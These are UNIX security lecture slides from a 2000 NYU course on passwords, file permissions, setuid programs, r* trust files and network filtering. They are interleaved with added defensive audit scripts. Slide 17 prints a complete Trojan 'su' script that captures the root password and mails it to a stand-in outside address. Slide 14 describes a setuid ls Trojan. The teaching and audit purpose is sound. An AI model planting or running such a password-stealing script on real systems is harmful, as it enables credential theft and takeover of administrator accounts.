2000 Copyrights, Danielle S. Lahmani UNIX Tools G22.2245-001, Fall 2000 Danielle S. Lahmani Lecture 11.

1 2000 Copyrights, Danielle S. Lahmani UNIX Tools G22.2245-001, Fall 2000 Danielle S. Lahmani email: lahmani@cs.nyu.edu Lecture 11

2 Security Definition
“Making sure that the data stored on a computer or computer networks, is accessible only to people who are authorized to see it, and that the data is safeguarded against corruption or loss.” by K. Christian

3 Two major goals of security
– Protect data against loss (can be achieved through frequent backups).
– Secure the system against intrusion and unauthorized use.

4 COMPONENTS OF SECURITY
– Authentication: proving that you are who you say you are
– Access Rights: giving you the information for which you have clearance
– Integrity: protecting information from unauthorized exposure
– Prevention of subversion: guard against replay attacks, Trojan horse attacks and covert channel attacks.

5 Security Definitions
– A Trojan horse is any program that performs some obvious functions and compromises a user's security at the same time.
– A covert channel is some way of getting information other than direct reads and writes; examples are the ps command or the viewing of /tmp.

6 Protection against Intruders
– Password security
– File and file system security
– Incorrect search PATH
– Denial of service
– Networking security

7 Passwords and Accounts
– Every person should have his or her individual account.
– Remove the accounts of people who no longer need them or have left the company.
– Provide each user with an initial password and instruct the user to change it immediately.

8 How Passwords Work
Passwords are encrypted:
– The login program uses the “salt” to encrypt the typed password and then checks whether the resulting string matches the password stored in /etc/passwd.

9 Password Security
People often use passwords that can be guessed easily. Several measures protect the login password:
– Most UNIX systems split the /etc/passwd file into two files:
– The file /etc/passwd no longer contains the encrypted user password.
– /etc/shadow contains the encrypted password and can only be read by root, to avoid subversion, making it less vulnerable to password cracking.

10 Security Measures for password security
– Passwords should be changed periodically.
– Don't use the same password on multiple machines.
– Don't use a previous password. If it was stolen before, the system can be compromised.
– Educate users about bad passwords and good passwords.
– Use password filtering.
– Enforce password aging.

11 Files and file system security
– A file can be write-locked, but if the directory is writable, an intruder can erase your file and write a new one.
– File permission modes are discretionary: the owner of the file can change them whenever the owner wants.
– Don't make your files or directories writable by others.
– Make the directory containing the file and its subdirectories write protected.

12 File and File system Security
– Use your own temporary directory under $HOME/tmp; /tmp and /usr/tmp are writable by others. Although your temporary file under these directories is writable only by you, a user can replace a temporary file in /tmp or /usr/tmp, which has the effect of changing your files.
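A check for the directory problem described on slides 11 and 12, as an added example that is not part of the lecture. The function name `writable_ancestors` and the sample paths are made up for this illustration; the separate treatment of sticky directories, where only a file's owner, the directory's owner or root may remove an entry, is an addition here.

```shell
#!/bin/sh
# Added example (not from the lecture): report every component on the way to
# a file that "other" users may write to. A writable directory lets another
# user remove or replace files in it, whatever the file's own mode says.

# writable_ancestors FILE
#   prints WORLD_WRITABLE <path> or STICKY_WORLD_WRITABLE <path> for the file
#   and each ancestor directory; returns 1 if a non-sticky one was found.
writable_ancestors() {
    p=$1
    found=0
    while :; do
        # The first ten characters of ls -ld are the type and permission
        # string, e.g. drwxrwxrwt; character 9 is write permission for other.
        mode=$(ls -ld "$p" 2>/dev/null | cut -c1-10)
        case $mode in
            l*) ;;                              # a symlink's own mode is not meaningful
            ????????w[tT]) echo "STICKY_WORLD_WRITABLE $p" ;;
            ????????w?)    echo "WORLD_WRITABLE $p"; found=1 ;;
        esac
        [ "$p" = / ] && break
        parent=$(dirname "$p")
        [ "$parent" = "$p" ] && break           # a relative path has reached "."
        p=$parent
    done
    return $found
}

# Constructed demonstration: a private file (mode 600) inside a directory
# that was left open to everyone, created under a scratch directory.
demo=$(mktemp -d)
mkdir "$demo/shared"
chmod 777 "$demo/shared"
: > "$demo/shared/report.txt"
chmod 600 "$demo/shared/report.txt"
writable_ancestors "$demo/shared/report.txt" ||
    echo "report.txt can be replaced by other users"
rm -rf "$demo"
```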

13 setuid/setgid programs
This is a feature whereby a program during its invocation acquires privileges of either a superuser or an author (the owner of the file) for the duration of the execution.

14 setuid/setgid subversion
– You can create a version of ls in a user's directory that precedes /bin in his path. This version has the setuid bit on.
– The first thing it does is to create a new file with the setuid bit on.
– Then it erases itself with some indication that a line has been disconnected.
– If you executed the file, you would have all the owner's privileges.

15 Scripts Precautions
– Do not write SUID/SGID shell scripts.
– Scripts should always have full pathnames.
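One way to check a system against the first precaution, as an added example that is not part of the lecture: list every setuid/setgid file under a directory and single out the ones that are interpreter scripts. The function names and the scratch files are made up for this illustration.

```shell
#!/bin/sh
# Added example (not from the lecture): inventory setuid/setgid files and
# single out interpreter scripts, which the slide says should not exist.

# audit_setid DIR
#   prints "<SCRIPT|OTHER> <mode> <owner> <path>" for every regular file
#   under DIR that has the setuid or setgid bit.
audit_setid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
    while IFS= read -r f; do
        # A file whose first two bytes are "#!" is run through an interpreter.
        if dd if="$f" bs=2 count=1 2>/dev/null | LC_ALL=C grep -q '^#!'; then
            kind=SCRIPT
        else
            kind=OTHER
        fi
        meta=$(ls -ld "$f" | awk '{print $1, $3}')   # mode string and owner
        echo "$kind $meta $f"
    done
}

# count_setid_scripts DIR -> number of setuid/setgid scripts under DIR
count_setid_scripts() {
    audit_setid "$1" | grep -c '^SCRIPT ' || true
}

# Constructed demonstration in a scratch directory: one setuid script and
# one setuid non-script file.
demo=$(mktemp -d)
printf '#!/bin/sh\nexec /bin/date\n' > "$demo/wrapper"
printf 'constructed placeholder, not a real program\n' > "$demo/tool"
chmod 4755 "$demo/wrapper" "$demo/tool"
audit_setid "$demo"
echo "setuid/setgid scripts found: $(count_setid_scripts "$demo")"
rm -rf "$demo"
```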

16 Superuser Precaution
– Discourage or disable direct login as root.
– Use /bin/su to gain root privileges: /bin/su attempts are logged with the name of the user who issued the su command.

17 su: subversion
– Name the following script su and place it in a directory that administrators search before the system's directories (it only works if the path is set to search the current directory first):

    stty -echo
    echo -n "Password:"
    read X
    echo ""
    stty echo
    echo $X | mail outside!creep &
    sleep 1
    echo Sorry.
    rm su

18 Security recommendations
Root accounts:
– Log in directly as root only at the console.
– Only root should have uid 0.
– Root should never have a "." in its path.
– Only use full pathnames when issuing a command.
– Do not create root temp files in publicly owned directories, if possible.
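Two of these recommendations as runnable checks, which also cover the search-path condition that the ls and su subversions on slides 14 and 17 depend on. This is an added example, not part of the lecture; the function names `audit_path` and `extra_uid0`, the sample path and the sample accounts are made up for this illustration.

```shell
#!/bin/sh
# Added example (not from the lecture): two checks from the root-account
# recommendations, usable on any PATH string or passwd-format file.

# audit_path PATHSTRING -> one finding per line; returns 1 if any was found.
audit_path() {
    path=$1
    bad=0
    # A leading, trailing or doubled ':' is an empty element, which the shell
    # searches as the current directory, exactly like ".".
    case ":$path:" in
        *::*) echo "EMPTY_ELEMENT"; bad=1 ;;
    esac
    old_ifs=$IFS
    IFS=:
    set -f                                  # split on ':' without globbing
    for dir in $path; do
        case $dir in
            '') ;;                          # reported above
            .)  echo "CURRENT_DIR ."; bad=1 ;;
            /*) # absolute, but still unsafe if anyone may drop a file into it;
                # "/." makes find look at the directory behind a symlink
                if [ -n "$(find "$dir/." -prune -perm -0002 -print 2>/dev/null)" ]; then
                    echo "WORLD_WRITABLE $dir"; bad=1
                fi ;;
            *)  echo "RELATIVE $dir"; bad=1 ;;
        esac
    done
    set +f
    IFS=$old_ifs
    return $bad
}

# extra_uid0 [PASSWD_FILE] -> accounts other than root that have uid 0
extra_uid0() {
    awk -F: '$3 ~ /^0+$/ && $1 != "root" { print $1 }' "${1:--}"
}

# Constructed inputs: a path with "." and a trailing ':', and two accounts.
audit_path "/usr/bin:.:/bin:" || echo "this path is not safe for root"
extra_uid0 <<'EOF'
root:x:0:0:root:/root:/bin/sh
toor:x:0:0:constructed second uid-0 account:/root:/bin/sh
EOF
```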

19 UNIX NETWORK SECURITY: BERKELEY SERVICES
– The r* commands allow host equivalency, which is based on the idea that if the user has been authenticated on one trusted computer (host), then there is no reason to reauthenticate the user on a second computer.
– Host equivalence is extended through use of .rhosts, .netrc and /etc/hosts.equiv files.

20 Berkeley r* commands
– An ordinary user can create a .rhosts file in her $HOME directory and extend host equivalence to herself when accessing the computer, without any intervention from a system administrator.
– In Sun systems, the r* commands have been modified to run on top of ssh (secure shell), which requires a password and ignores .rhosts equivalence.
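Because users can create these files without the administrator, an audit has to go looking for them. The following is an added example, not part of the lecture: it walks the home directories named in a passwd-format file and reports .rhosts files, .netrc files readable by group or other, and bare "+" entries, which match every host or user. The function names and the sample accounts are made up for this illustration.

```shell
#!/bin/sh
# Added example (not from the lecture): locate host-equivalence files that
# users can create themselves and flag entries that trust every host or user.

# has_wildcard FILE: true if a line has a bare "+" as host or user field
# ("+@group" netgroup references are not counted).
has_wildcard() {
    grep -Eq '^[[:space:]]*([^[:space:]]+[[:space:]]+)?\+([[:space:]]|$)' "$1"
}

# audit_trust PASSWD_FILE [HOSTS_EQUIV]
#   home directories come from field 6 of a passwd-format file
audit_trust() {
    equiv=${2:-/etc/hosts.equiv}
    if [ -f "$equiv" ]; then
        echo "EQUIV $equiv"
        if has_wildcard "$equiv"; then echo "WILDCARD $equiv"; fi
    fi
    awk -F: '$6 != "" { print $1 ":" $6 }' "$1" |
    while IFS=: read -r user home; do
        if [ -f "$home/.rhosts" ]; then
            echo "RHOSTS $user $home/.rhosts"
            if has_wildcard "$home/.rhosts"; then
                echo "WILDCARD $user $home/.rhosts"
            fi
        fi
        # .netrc may hold cleartext passwords: group/other need no access.
        if [ -f "$home/.netrc" ]; then
            case $(ls -ld "$home/.netrc" | cut -c5-10) in
                ------) ;;
                *) echo "NETRC_EXPOSED $user $home/.netrc" ;;
            esac
        fi
    done
    return 0
}

# Constructed demonstration: two accounts under a scratch directory.
demo=$(mktemp -d)
mkdir -p "$demo/alice" "$demo/bob"
printf 'trusted.example.com alice\n' > "$demo/alice/.rhosts"
printf '+ +\n' > "$demo/bob/.rhosts"
printf 'alice:x:1001:100::%s:/bin/sh\nbob:x:1002:100::%s:/bin/sh\n' \
    "$demo/alice" "$demo/bob" > "$demo/passwd"
audit_trust "$demo/passwd" "$demo/no-hosts-equiv"
rm -rf "$demo"
```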

21 Security Standards and technology
– S-HTTP: Secure HTTP is an extension to the HTTP protocol to provide authentication and encryption facilities at the setup of a session. Client and server negotiate which encryption mechanism will be used to secure the messages.
– SSL: Secure Socket Layer provides server authentication, data encryption and message integrity at the transport layer.
– Use of SSL and S-HTTP is not mutually exclusive.

22 Security Standards (cont'd)
– Secure IP (IPv6) is a specification for extensions to the IP protocol that includes additional security functions: an authentication header and the encapsulation security payload (ESP) protocol.
– The authentication header holds computed authentication information based on the message.
– The ESP protocol provides the ability to encrypt some or all of the messages.

23 RECOMMENDATIONS FOR NETWORK SECURITY
Source: http://www.unixtools.com/securecheck.html

24 Network Security: Filtering
– Do not enable services you are not using (/etc/inetd.conf).
– Create access control lists in /var/adm/inetd.sec to say what hosts can connect.
– Filter out unnecessary services at the router; only allow services you need.
– If you are on the Internet, build a firewall.

25 FTP SECURITY
– Make sure you have /ftp/users with all system accounts (uucp, bin, root).
– Minimal permissions / minimal accounts.
– Always use FTP logging and look at the logs.
– Make directories unwriteable.

26 PREVENT SPOOFING
Router mode:
– Turn off source routing.
– Apply a filter that guarantees that packets coming from the outside network do not have a source IP address that matches the inside network.
– Qualified hostnames only in system files (NFS, hosts.equiv…).
– No hosts.equiv or .rhosts if possible.

